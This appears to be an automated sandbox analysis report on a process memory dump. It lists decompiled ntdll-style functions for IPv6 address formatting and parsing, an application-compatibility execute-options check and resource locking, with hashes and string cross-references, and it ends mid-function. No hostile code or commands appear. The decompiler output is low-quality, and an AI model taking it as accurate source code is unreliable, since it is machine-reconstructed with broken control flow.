0x01e38896
0x01e38899
0x01e38899
0x01e3889e
0x00000000
0x00000000
0x01e81b21
0x01e81b27
0x01e81b2e
0x01e81b42
0x01e81b44
0x01e81b44
0x01e81b4c
0x01e81b4f
0x01e81b55
0x01e81b55
0x01e388a4
0x01e388aa
0x01e388b1
0x01e388c5
0x01e81b5b
0x01e81b5b
0x01e388c5
0x01e388ce
0x01e388e0
0x01e388e5
0x01e388e8
0x01e388e8
0x01e388ee
0x01e38900
0x01e38900
0x01e38905
0x00000000
0x01e38905

APIs

_wcspbrk.LIBCMT ref: 01E38891
_wcspbrk.LIBCMT ref: 01E38979
_wcspbrk.LIBCMT ref: 01E38A61
_wcspbrk.LIBCMT ref: 01E38A9B
_wcspbrk.LIBCMT ref: 01E81B9C

Strings

Kernel-MUI-Language-Disallowed, xrefs: 01E38914
Kernel-MUI-Language-Allowed, xrefs: 01E38827
Kernel-MUI-Language-SKU, xrefs: 01E389FC
WindowsExcludedProcs, xrefs: 01E387C1
Kernel-MUI-Number-Allowed, xrefs: 01E387E6

Memory Dump Source

Source File: 00000007.00000002.2355769826.0000000001E00000.00000040.00000001.sdmp, Offset: 01DF0000, based on PE: true

Associated: 00000007.00000002.2355764388.0000000001DF0000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2355965991.0000000001EE0000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2355971041.0000000001EF0000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2355978469.0000000001EF4000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2355985432.0000000001EF7000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2355990772.0000000001F00000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2356042887.0000000001F60000.00000040.00000001.sdmp Download File

Similarity

API ID: _wcspbrk
String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
API String ID: 402402107-258546922
Opcode ID: a864dd30078a80cb6b0f7071475a06fcf58da1f79e635dbcceb079ce92345c9d
Instruction ID: 155342371b7d6ea8a469a7c18bd2b7e5618c17ab99bd2158fc17196e9b90f89a
Opcode Fuzzy Hash: a864dd30078a80cb6b0f7071475a06fcf58da1f79e635dbcceb079ce92345c9d
Instruction Fuzzy Hash: 1BF13DB2D0024AEFCF11EF98C984DEEBBB8FF58304F14656AE606A7210D7319A45CB50

Uniqueness

Uniqueness Score: -1.00%

Function 01E513CB, Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 195
COMMON

Download Yara Rule

C-Code - Quality: 38%

			E01E513CB(intOrPtr* _a4, intOrPtr _a8) {
				char _v8;
				intOrPtr _v12;
				intOrPtr* _v16;
				intOrPtr _v20;
				char _v24;
				intOrPtr _t71;
				signed int _t78;
				signed int _t86;
				char _t90;
				signed int _t91;
				signed int _t96;
				intOrPtr _t108;
				signed int _t114;
				void* _t115;
				intOrPtr _t128;
				intOrPtr* _t129;
				void* _t130;

				_t129 = _a4;
				_t128 = _a8;
				_t116 = 0;
				_t71 = _t128 + 0x5c;
				_v8 = 8;
				_v20 = _t71;
				if( *_t129 == 0) {
					if( *((intOrPtr*)(_t129 + 2)) != 0 ||  *((intOrPtr*)(_t129 + 4)) != 0 ||  *((intOrPtr*)(_t129 + 6)) != 0 ||  *(_t129 + 0xc) == 0) {
						goto L5;
					} else {
						_t96 =  *(_t129 + 8) & 0x0000ffff;
						if(_t96 != 0) {
							L38:
							if(_t96 != 0xffff ||  *(_t129 + 0xa) != _t116) {
								goto L5;
							} else {
								_push( *(_t129 + 0xf) & 0x000000ff);
								_push( *(_t129 + 0xe) & 0x000000ff);
								_push( *(_t129 + 0xd) & 0x000000ff);
								_t86 = E01E47707(_t128, _t71 - _t128 >> 1, L"::ffff:0:%u.%u.%u.%u",  *(_t129 + 0xc) & 0x000000ff);
								L36:
								return _t128 + _t86 * 2;
							}
						}
						_t114 =  *(_t129 + 0xa) & 0x0000ffff;
						if(_t114 == 0) {
							L33:
							_t115 = 0x1e12926;
							L35:
							_push( *(_t129 + 0xf) & 0x000000ff);
							_push( *(_t129 + 0xe) & 0x000000ff);
							_push( *(_t129 + 0xd) & 0x000000ff);
							_push( *(_t129 + 0xc) & 0x000000ff);
							_t86 = E01E47707(_t128, _t71 - _t128 >> 1, L"::%hs%u.%u.%u.%u", _t115);
							goto L36;
						}
						if(_t114 != 0xffff) {
							_t116 = 0;
							goto L38;
						}
						if(_t114 != 0) {
							_t115 = 0x1e19cac;
							goto L35;
						}
						goto L33;
					}
				} else {
					L5:
					_a8 = _t116;
					_a4 = _t116;
					_v12 = _t116;
					if(( *(_t129 + 8) & 0x0000fffd) == 0) {
						if( *(_t129 + 0xa) == 0xfe5e) {
							_v8 = 6;
						}
					}
					_t90 = _v8;
					if(_t90 <= _t116) {
						L11:
						if(_a8 - _a4 <= 1) {
							_a8 = _t116;
							_a4 = _t116;
						}
						_t91 = 0;
						if(_v8 <= _t116) {
							L22:
							if(_v8 < 8) {
								_push( *(_t129 + 0xf) & 0x000000ff);
								_push( *(_t129 + 0xe) & 0x000000ff);
								_push( *(_t129 + 0xd) & 0x000000ff);
								_t128 = _t128 + E01E47707(_t128, _t71 - _t128 >> 1, L":%u.%u.%u.%u",  *(_t129 + 0xc) & 0x000000ff) * 2;
							}
							return _t128;
						} else {
							L14:
							L14:
							if(_a4 > _t91 || _t91 >= _a8) {
								if(_t91 != _t116 && _t91 != _a8) {
									_push(":");
									_push(_t71 - _t128 >> 1);
									_push(_t128);
									_t128 = _t128 + E01E47707() * 2;
									_t71 = _v20;
									_t130 = _t130 + 0xc;
								}
								_t78 = E01E47707(_t128, _t71 - _t128 >> 1, L"%x",  *(_t129 + _t91 * 2) & 0x0000ffff);
								_t130 = _t130 + 0x10;
							} else {
								_push(L"::");
								_push(_t71 - _t128 >> 1);
								_push(_t128);
								_t78 = E01E47707();
								_t130 = _t130 + 0xc;
								_t91 = _a8 - 1;
							}
							_t91 = _t91 + 1;
							_t128 = _t128 + _t78 * 2;
							_t71 = _v20;
							if(_t91 >= _v8) {
								goto L22;
							}
							_t116 = 0;
							goto L14;
						}
					} else {
						_t108 = 1;
						_v16 = _t129;
						_v24 = _t90;
						do {
							if( *_v16 == _t116) {
								if(_t108 - _v12 > _a8 - _a4) {
									_a4 = _v12;
									_a8 = _t108;
								}
								_t116 = 0;
							} else {
								_v12 = _t108;
							}
							_v16 = _v16 + 2;
							_t108 = _t108 + 1;
							_t26 =  &_v24;
							 *_t26 = _v24 - 1;
						} while ( *_t26 != 0);
						goto L11;
					}
				}
			}

0x01e513d5
0x01e513d9
0x01e513dc
0x01e513de
0x01e513e1
0x01e513e8
0x01e513ee
0x01e7e8fd
0x00000000
0x01e7e921
0x01e7e921
0x01e7e928
0x01e7e982
0x01e7e98a
0x00000000
0x01e7e99a
0x01e7e99e
0x01e7e9a3
0x01e7e9a8
0x01e7e9b9
0x01e7e978
0x00000000
0x01e7e978
0x01e7e98a
0x01e7e92a
0x01e7e931
0x01e7e944
0x01e7e944
0x01e7e950
0x01e7e954
0x01e7e959
0x01e7e95e
0x01e7e963
0x01e7e970
0x00000000
0x01e7e975
0x01e7e93b
0x01e7e980
0x00000000
0x01e7e980
0x01e7e942
0x01e7e94b
0x00000000
0x01e7e94b
0x00000000
0x01e7e942
0x01e513f4
0x01e513f4
0x01e513f9
0x01e513fc
0x01e513ff
0x01e51406
0x01e7e9cc
0x01e7e9d2
0x01e7e9d2
0x01e7e9cc
0x01e5140c
0x01e51411
0x01e51431
0x01e5143a
0x01e5143c
0x01e5143f
0x01e5143f
0x01e51442
0x01e51447
0x01e514a8
0x01e514ac
0x01e7e9e2
0x01e7e9e7
0x01e7e9ec
0x01e7ea05
0x01e7ea05
0x00000000
0x01e51449
0x00000000
0x01e51449
0x01e5144c
0x01e51459
0x01e51462
0x01e51469
0x01e5146a
0x01e51470
0x01e51473
0x01e51476
0x01e51476
0x01e51490
0x01e51495
0x01e5138e
0x01e51390
0x01e51397
0x01e51398
0x01e51399
0x01e513a1
0x01e513a4
0x01e513a4
0x01e51498
0x01e5149c
0x01e5149f
0x01e514a2
0x00000000
0x00000000
0x01e514a4
0x00000000
0x01e514a4
0x01e51413
0x01e51415
0x01e51416
0x01e51419
0x01e5141c
0x01e51422
0x01e513b7
0x01e513bc
0x01e513bf
0x01e513bf
0x01e513c2
0x01e51424
0x01e51424
0x01e51424
0x01e51427
0x01e5142b
0x01e5142c
0x01e5142c
0x01e5142c
0x00000000
0x01e5141c
0x01e51411

APIs

___swprintf_l.LIBCMT ref: 01E5146B
___swprintf_l.LIBCMT ref: 01E51490
___swprintf_l.LIBCMT ref: 01E7E970

Strings

ffff:, xrefs: 01E7E94B
::%hs%u.%u.%u.%u, xrefs: 01E7E967
:%u.%u.%u.%u, xrefs: 01E7E9F4
::ffff:0:%u.%u.%u.%u, xrefs: 01E7E9B0

Memory Dump Source

Source File: 00000007.00000002.2355769826.0000000001E00000.00000040.00000001.sdmp, Offset: 01DF0000, based on PE: true

Associated: 00000007.00000002.2355764388.0000000001DF0000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2355965991.0000000001EE0000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2355971041.0000000001EF0000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2355978469.0000000001EF4000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2355985432.0000000001EF7000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2355990772.0000000001F00000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2356042887.0000000001F60000.00000040.00000001.sdmp Download File

Similarity

API ID: ___swprintf_l
String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
API String ID: 48624451-2108815105
Opcode ID: f0a87a983974c27e5010ffdc7f3709d413443110d121fafde93e682caafb11d5
Instruction ID: efcf104cb1812ce0a569901eee8ca8c8f5b6530f449c2110f9c94013229393cc
Opcode Fuzzy Hash: f0a87a983974c27e5010ffdc7f3709d413443110d121fafde93e682caafb11d5
Instruction Fuzzy Hash: 576156B1D00696AADB35DF5DC8908BFBFB5EF94308B48E06DE9D647541D334A640CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 01E47EFD, Relevance: 14.1, APIs: 1, Strings: 7, Instructions: 127
COMMON

Download Yara Rule

C-Code - Quality: 64%

			E01E47EFD(void* __ecx, intOrPtr _a4) {
				signed int _v8;
				char _v540;
				unsigned int _v544;
				signed int _v548;
				intOrPtr _v552;
				char _v556;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t33;
				void* _t38;
				unsigned int _t46;
				unsigned int _t47;
				unsigned int _t52;
				intOrPtr _t56;
				unsigned int _t62;
				void* _t69;
				void* _t70;
				intOrPtr _t72;
				signed int _t73;
				void* _t74;
				void* _t75;
				void* _t76;
				void* _t77;

				_t33 =  *0x1ef2088; // 0x776a2a97
				_v8 = _t33 ^ _t73;
				_v548 = _v548 & 0x00000000;
				_t72 = _a4;
				if(E01E47F4F(__ecx, _t72 + 0x2c,  &_v548) >= 0) {
					__eflags = _v548;
					if(_v548 == 0) {
						goto L1;
					}
					_t62 = _t72 + 0x24;
					E01E63F92(0x55, 3, "CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions\n", _v548);
					_t71 = 0x214;
					_v544 = 0x214;
					E01E1DFC0( &_v540, 0, 0x214);
					_t75 = _t74 + 0x20;
					_t46 =  *0x1ef4218( *((intOrPtr*)(_t72 + 0x28)),  *((intOrPtr*)(_t72 + 0x18)),  *((intOrPtr*)(_t72 + 0x20)), L"ExecuteOptions",  &_v556,  &_v540,  &_v544, _t62);
					__eflags = _t46;
					if(_t46 == 0) {
						goto L1;
					}
					_t47 = _v544;
					__eflags = _t47;
					if(_t47 == 0) {
						goto L1;
					}
					__eflags = _t47 - 0x214;
					if(_t47 >= 0x214) {
						goto L1;
					}
					_push(_t62);
					 *((short*)(_t73 + (_t47 >> 1) * 2 - 0x21a)) = 0;
					E01E63F92(0x55, 3, "CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database\n",  &_v540);
					_t52 = E01E20D27( &_v540, L"Execute=1");
					_t76 = _t75 + 0x1c;
					_push(_t62);
					__eflags = _t52;
					if(_t52 == 0) {
						E01E63F92(0x55, 3, "CLIENT(ntdll): Processing %ws for patching section protection for %wZ\n",  &_v540);
						_t71 =  &_v540;
						_t56 = _t73 + _v544 - 0x218;
						_t77 = _t76 + 0x14;
						_v552 = _t56;
						__eflags = _t71 - _t56;
						if(_t71 >= _t56) {
							goto L1;
						} else {
							goto L10;
						}
						while(1) {
							L10:
							_t62 = E01E28375(_t71, 0x20);
							_pop(_t69);
							__eflags = _t62;
							if(__eflags != 0) {
								__eflags = 0;
								 *_t62 = 0;
							}
							E01E63F92(0x55, 3, "CLIENT(ntdll): Processing section info %ws...\n", _t71);
							_t77 = _t77 + 0x10;
							E01E8E8DB(_t69, _t70, __eflags, _t72, _t71);
							__eflags = _t62;
							if(_t62 == 0) {
								goto L1;
							}
							_t31 = _t62 + 2; // 0x2
							_t71 = _t31;
							__eflags = _t71 - _v552;
							if(_t71 >= _v552) {
								goto L1;
							}
						}
					}
					_push("CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ\n");
					_push(3);
					_push(0x55);
					E01E63F92();
					_t38 = 1;
					L2:
					return E01E1E1B4(_t38, _t62, _v8 ^ _t73, _t70, _t71, _t72);
				}
				L1:
				_t38 = 0;
				goto L2;
			}

0x01e47f08
0x01e47f0f
0x01e47f12
0x01e47f1b
0x01e47f31
0x01e63ead
0x01e63eb4
0x00000000
0x00000000
0x01e63eba
0x01e63ecd
0x01e63ed2
0x01e63ee1
0x01e63ee7
0x01e63eec
0x01e63f12
0x01e63f18
0x01e63f1a
0x00000000
0x00000000
0x01e63f20
0x01e63f26
0x01e63f28
0x00000000
0x00000000
0x01e63f2e
0x01e63f30
0x00000000
0x00000000
0x01e63f3a
0x01e63f3b
0x01e63f53
0x01e63f64
0x01e63f69
0x01e63f6c
0x01e63f6d
0x01e63f6f
0x01e6e304
0x01e6e30f
0x01e6e315
0x01e6e31e
0x01e6e321
0x01e6e327
0x01e6e329
0x00000000
0x00000000
0x00000000
0x00000000
0x01e6e32f
0x01e6e32f
0x01e6e337
0x01e6e33a
0x01e6e33b
0x01e6e33d
0x01e6e33f
0x01e6e341
0x01e6e341
0x01e6e34e
0x01e6e353
0x01e6e358
0x01e6e35d
0x01e6e35f
0x00000000
0x00000000
0x01e6e365
0x01e6e365
0x01e6e368
0x01e6e36e
0x00000000
0x00000000
0x01e6e374
0x01e6e32f
0x01e63f75
0x01e63f7a
0x01e63f7c
0x01e63f7e
0x01e63f86
0x01e47f39
0x01e47f47
0x01e47f47
0x01e47f37
0x01e47f37
0x00000000

APIs

BaseQueryModuleData.KERNEL32(?,00000000,00000000,ExecuteOptions,?,?,?), ref: 01E63F12

Strings

Execute=1, xrefs: 01E63F5E
CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 01E63F75
CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 01E6E2FB
CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 01E63EC4
ExecuteOptions, xrefs: 01E63F04
CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 01E63F4A
CLIENT(ntdll): Processing section info %ws..., xrefs: 01E6E345

Memory Dump Source

Source File: 00000007.00000002.2355769826.0000000001E00000.00000040.00000001.sdmp, Offset: 01DF0000, based on PE: true

Associated: 00000007.00000002.2355764388.0000000001DF0000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2355965991.0000000001EE0000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2355971041.0000000001EF0000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2355978469.0000000001EF4000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2355985432.0000000001EF7000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2355990772.0000000001F00000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2356042887.0000000001F60000.00000040.00000001.sdmp Download File

Similarity

API ID: BaseDataModuleQuery
String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
API String ID: 3901378454-484625025
Opcode ID: 3617e40a9ce64b21fa296de1b7e7c64b424b73ff0d4e3da34bdabac2641a02bf
Instruction ID: a303a9b93a50e65cdc786140e70f6b9cc7d8671160fd1431814dc07fb8fcc095
Opcode Fuzzy Hash: 3617e40a9ce64b21fa296de1b7e7c64b424b73ff0d4e3da34bdabac2641a02bf
Instruction Fuzzy Hash: C9410732A8061D7BDB20DA94DC85FDE73BCAB14704F4014A9E608A6081E7709A858BA0

Uniqueness

Uniqueness Score: -1.00%

Function 01E50B15, Relevance: 12.5, APIs: 4, Strings: 3, Instructions: 272
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E01E50B15(intOrPtr* _a4, char _a7, intOrPtr* _a8, intOrPtr _a12) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				void* _t108;
				void* _t116;
				char _t120;
				short _t121;
				void* _t128;
				intOrPtr* _t130;
				char _t132;
				short _t133;
				intOrPtr _t141;
				signed int _t156;
				signed int _t174;
				intOrPtr _t177;
				intOrPtr* _t179;
				intOrPtr _t180;
				void* _t183;

				_t179 = _a4;
				_t141 =  *_t179;
				_v16 = 0;
				_v28 = 0;
				_v8 = 0;
				_v24 = 0;
				_v12 = 0;
				_v32 = 0;
				_v20 = 0;
				if(_t141 == 0) {
					L41:
					 *_a8 = _t179;
					_t180 = _v24;
					if(_t180 != 0) {
						if(_t180 != 3) {
							goto L6;
						}
						_v8 = _v8 + 1;
					}
					_t174 = _v32;
					if(_t174 == 0) {
						if(_v8 == 7) {
							goto L43;
						}
						goto L6;
					}
					L43:
					if(_v16 != 1) {
						if(_v16 != 2) {
							goto L6;
						}
						 *((short*)(_a12 + _v20 * 2)) = 0;
						L47:
						if(_t174 != 0) {
							E01E28980(_a12 + 0x10 + (_t174 - _v8) * 2, _a12 + _t174 * 2, _v8 - _t174 + _v8 - _t174);
							_t116 = 8;
							E01E1DFC0(_a12 + _t174 * 2, 0, _t116 - _v8 + _t116 - _v8);
						}
						return 0;
					}
					if(_t180 != 0) {
						if(_v12 > 3) {
							goto L6;
						}
						_t120 = E01E50CFA(_v28, 0, 0xa);
						_t183 = _t183 + 0xc;
						if(_t120 > 0xff) {
							goto L6;
						}
						 *((char*)(_t180 + _v20 * 2 + _a12)) = _t120;
						goto L47;
					}
					if(_v12 > 4) {
						goto L6;
					}
					_t121 = E01E50CFA(_v28, _t180, 0x10);
					_t183 = _t183 + 0xc;
					 *((short*)(_a12 + _v20 * 2)) = _t121;
					goto L47;
				} else {
					while(1) {
						_t123 = _v16;
						if(_t123 == 0) {
							goto L7;
						}
						_t108 = _t123 - 1;
						if(_t108 != 0) {
							goto L1;
						}
						_t178 = _t141;
						if(E01E506BA(_t108, _t141) == 0 || _t135 == 0) {
							if(E01E506BA(_t135, _t178) == 0 || E01E50A5B(_t136, _t178) == 0) {
								if(_t141 != 0x3a) {
									if(_t141 == 0x2e) {
										if(_a7 != 0 || _v24 > 2 || _v8 > 6) {
											goto L41;
										} else {
											_v24 = _v24 + 1;
											L27:
											_v16 = _v16 & 0x00000000;
											L28:
											if(_v28 == 0) {
												goto L20;
											}
											_t177 = _v24;
											if(_t177 != 0) {
												if(_v12 > 3) {
													L6:
													return 0xc000000d;
												}
												_t132 = E01E50CFA(_v28, 0, 0xa);
												_t183 = _t183 + 0xc;
												if(_t132 > 0xff) {
													goto L6;
												}
												 *((char*)(_t177 + _v20 * 2 + _a12 - 1)) = _t132;
												goto L20;
											}
											if(_v12 > 4) {
												goto L6;
											}
											_t133 = E01E50CFA(_v28, 0, 0x10);
											_t183 = _t183 + 0xc;
											_v20 = _v20 + 1;
											 *((short*)(_a12 + _v20 * 2)) = _t133;
											goto L20;
										}
									}
									goto L41;
								}
								if(_v24 > 0 || _v8 > 6) {
									goto L41;
								} else {
									_t130 = _t179 + 1;
									if( *_t130 == _t141) {
										if(_v32 != 0) {
											goto L41;
										}
										_v32 = _v8 + 1;
										_t156 = 2;
										_v8 = _v8 + _t156;
										L34:
										_t179 = _t130;
										_v16 = _t156;
										goto L28;
									}
									_v8 = _v8 + 1;
									goto L27;
								}
							} else {
								_v12 = _v12 + 1;
								if(_v24 > 0) {
									goto L41;
								}
								_a7 = 1;
								goto L20;
							}
						} else {
							_v12 = _v12 + 1;
							L20:
							_t179 = _t179 + 1;
							_t141 =  *_t179;
							if(_t141 == 0) {
								goto L41;
							}
							continue;
						}
						L7:
						if(_t141 == 0x3a) {
							if(_v24 > 0 || _v8 > 0) {
								goto L41;
							} else {
								_t130 = _t179 + 1;
								if( *_t130 != _t141) {
									goto L41;
								}
								_v20 = _v20 + 1;
								_t156 = 2;
								_v32 = 1;
								_v8 = _t156;
								 *((short*)(_a12 + _v20 * 2)) = 0;
								goto L34;
							}
						}
						L8:
						if(_v8 > 7) {
							goto L41;
						}
						_t142 = _t141;
						if(E01E506BA(_t123, _t141) == 0 || _t124 == 0) {
							if(E01E506BA(_t124, _t142) == 0 || E01E50A5B(_t125, _t142) == 0 || _v24 > 0) {
								goto L41;
							} else {
								_t128 = 1;
								_a7 = 1;
								_v28 = _t179;
								_v16 = 1;
								_v12 = 1;
								L39:
								if(_v16 == _t128) {
									goto L20;
								}
								goto L28;
							}
						} else {
							_a7 = 0;
							_v28 = _t179;
							_v16 = 1;
							_v12 = 1;
							goto L20;
						}
					}
				}
				L1:
				_t123 = _t108 == 1;
				if(_t108 == 1) {
					goto L8;
				}
				_t128 = 1;
				goto L39;
			}

0x01e50b21
0x01e50b24
0x01e50b27
0x01e50b2a
0x01e50b2d
0x01e50b30
0x01e50b33
0x01e50b36
0x01e50b39
0x01e50b3e
0x01e50c65
0x01e50c68
0x01e50c6a
0x01e50c6f
0x01e7eb42
0x00000000
0x00000000
0x01e7eb48
0x01e7eb48
0x01e50c75
0x01e50c7a
0x01e7eb54
0x00000000
0x00000000
0x00000000
0x01e7eb5a
0x01e50c80
0x01e50c84
0x01e7eb98
0x00000000
0x00000000
0x01e7eba6
0x01e50cb8
0x01e50cba
0x01e50cd3
0x01e50cda
0x01e50ce4
0x01e50ce9
0x00000000
0x01e50cec
0x01e50c8c
0x01e7eb63
0x00000000
0x00000000
0x01e7eb70
0x01e7eb75
0x01e7eb7d
0x00000000
0x00000000
0x01e7eb8c
0x00000000
0x01e7eb8c
0x01e50c96
0x00000000
0x00000000
0x01e50ca2
0x01e50cac
0x01e50cb4
0x00000000
0x00000000
0x01e50b44
0x01e50b47
0x01e50b49
0x00000000
0x00000000
0x01e50b4f
0x01e50b50
0x00000000
0x00000000
0x01e50b56
0x01e50b62
0x01e50b7c
0x01e50bac
0x01e50a0f
0x01e7eaaa
0x00000000
0x01e7eac4
0x01e7eac4
0x01e50bd0
0x01e50bd0
0x01e50bd4
0x01e50bd9
0x00000000
0x00000000
0x01e50bdb
0x01e50be0
0x01e7eb0e
0x01e50a1a
0x00000000
0x01e50a1a
0x01e7eb1a
0x01e7eb1f
0x01e7eb27
0x00000000
0x00000000
0x01e7eb36
0x00000000
0x01e7eb36
0x01e50bea
0x00000000
0x00000000
0x01e50bf6
0x01e50c00
0x01e50c03
0x01e50c0b
0x00000000
0x01e50c0b
0x01e7eaaa
0x00000000
0x01e50a15
0x01e50bb6
0x00000000
0x01e50bc6
0x01e50bc6
0x01e50bcb
0x01e50c15
0x00000000
0x00000000
0x01e50c1d
0x01e50c20
0x01e50c21
0x01e50c24
0x01e50c24
0x01e50c26
0x00000000
0x01e50c26
0x01e50bcd
0x00000000
0x01e50bcd
0x01e50b89
0x01e50b89
0x01e50b90
0x00000000
0x00000000
0x01e50b96
0x00000000
0x01e50b96
0x01e50a04
0x01e50a04
0x01e50b9a
0x01e50b9a
0x01e50b9b
0x01e50b9f
0x00000000
0x00000000
0x00000000
0x01e50ba5
0x01e50ac7
0x01e50aca
0x01e7eacf
0x00000000
0x01e7eade
0x01e7eade
0x01e7eae3
0x00000000
0x00000000
0x01e7eaf3
0x01e7eaf6
0x01e7eaf7
0x01e7eafe
0x01e7eb01
0x00000000
0x01e7eb01
0x01e7eacf
0x01e50ad0
0x01e50ad4
0x00000000
0x00000000
0x01e50ada
0x01e50ae6
0x01e50c34
0x00000000
0x01e50c47
0x01e50c49
0x01e50c4a
0x01e50c4e
0x01e50c51
0x01e50c54
0x01e50c57
0x01e50c5a
0x00000000
0x00000000
0x00000000
0x01e50c60
0x01e50afb
0x01e50afe
0x01e50b02
0x01e50b05
0x01e50b08
0x00000000
0x01e50b08
0x01e50ae6
0x01e50b44
0x01e509f8
0x01e509f8
0x01e509f9
0x00000000
0x00000000
0x01e7eaa0
0x00000000

APIs

__fassign.LIBCMT ref: 01E50BF6
__fassign.LIBCMT ref: 01E50CA2

Strings

:, xrefs: 01E50BA9
., xrefs: 01E50A0C
:, xrefs: 01E50AC7

Memory Dump Source

Source File: 00000007.00000002.2355769826.0000000001E00000.00000040.00000001.sdmp, Offset: 01DF0000, based on PE: true

Associated: 00000007.00000002.2355764388.0000000001DF0000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2355965991.0000000001EE0000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2355971041.0000000001EF0000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2355978469.0000000001EF4000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2355985432.0000000001EF7000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2355990772.0000000001F00000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2356042887.0000000001F60000.00000040.00000001.sdmp Download File

Similarity

API ID: __fassign
String ID: .$:$:
API String ID: 3965848254-2308638275
Opcode ID: b15de34944a390e3fa5e98378680e2de18144008d38fd4e6897fe19ea25b26ab
Instruction ID: ac06e3f3faeb69b9805372a3cb96f1c66932732f8abd6a90089cc6848acf3396
Opcode Fuzzy Hash: b15de34944a390e3fa5e98378680e2de18144008d38fd4e6897fe19ea25b26ab
Instruction Fuzzy Hash: 64A18D7190034ADEDFA9CF68C8457BEBBB5AF46308F24A46AFD42A7241D7309A41CB51

Uniqueness

Uniqueness Score: -1.00%

Function 01E50554, Relevance: 10.7, APIs: 2, Strings: 4, Instructions: 202
COMMON

Download Yara Rule

C-Code - Quality: 49%

			E01E50554(signed int _a4, char _a8) {
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int* _t49;
				signed int _t51;
				signed int _t56;
				signed int _t58;
				signed int _t61;
				signed int _t63;
				void* _t66;
				intOrPtr _t67;
				signed int _t70;
				void* _t75;
				signed int _t81;
				signed int _t84;
				void* _t86;
				signed int _t93;
				signed int _t96;
				intOrPtr _t105;
				signed int _t107;
				void* _t110;
				signed int _t115;
				signed int* _t119;
				void* _t125;
				void* _t126;
				signed int _t128;
				signed int _t130;
				signed int _t138;
				signed int _t144;
				void* _t158;
				void* _t159;
				void* _t160;

				_t96 = _a4;
				_t115 =  *(_t96 + 0x28);
				_push(_t138);
				if(_t115 < 0) {
					_t105 =  *[fs:0x18];
					__eflags =  *((intOrPtr*)(_t96 + 0x2c)) -  *((intOrPtr*)(_t105 + 0x24));
					if( *((intOrPtr*)(_t96 + 0x2c)) !=  *((intOrPtr*)(_t105 + 0x24))) {
						goto L6;
					} else {
						__eflags = _t115 | 0xffffffff;
						asm("lock xadd [eax], edx");
						return 1;
					}
				} else {
					L6:
					_push(_t128);
					while(1) {
						L7:
						__eflags = _t115;
						if(_t115 >= 0) {
							break;
						}
						__eflags = _a8;
						if(_a8 == 0) {
							__eflags = 0;
							return 0;
						} else {
							 *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) =  *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) + 1;
							_t49 = _t96 + 0x1c;
							_t106 = 1;
							asm("lock xadd [edx], ecx");
							_t115 =  *(_t96 + 0x28);
							__eflags = _t115;
							if(_t115 < 0) {
								L23:
								_t130 = 0;
								__eflags = 0;
								while(1) {
									_t118 =  *(_t96 + 0x30) & 0x00000001;
									asm("sbb esi, esi");
									_t144 =  !( ~( *(_t96 + 0x30) & 1)) & 0x01ef01c0;
									_push(_t144);
									_push(0);
									_t51 = E01E0F8CC( *((intOrPtr*)(_t96 + 0x18)));
									__eflags = _t51 - 0x102;
									if(_t51 != 0x102) {
										break;
									}
									_t106 =  *(_t144 + 4);
									_t126 =  *_t144;
									_t86 = E01E54FC0(_t126,  *(_t144 + 4), 0xff676980, 0xffffffff);
									_push(_t126);
									_push(_t86);
									E01E63F92(0x65, 0, "RTL: Acquire Shared Sem Timeout %d(%I64u secs)\n", _t130);
									E01E63F92(0x65, 0, "RTL: Resource at %p\n", _t96);
									_t130 = _t130 + 1;
									_t160 = _t158 + 0x28;
									__eflags = _t130 - 2;
									if(__eflags > 0) {
										E01E9217A(_t106, __eflags, _t96);
									}
									_push("RTL: Re-Waiting\n");
									_push(0);
									_push(0x65);
									E01E63F92();
									_t158 = _t160 + 0xc;
								}
								__eflags = _t51;
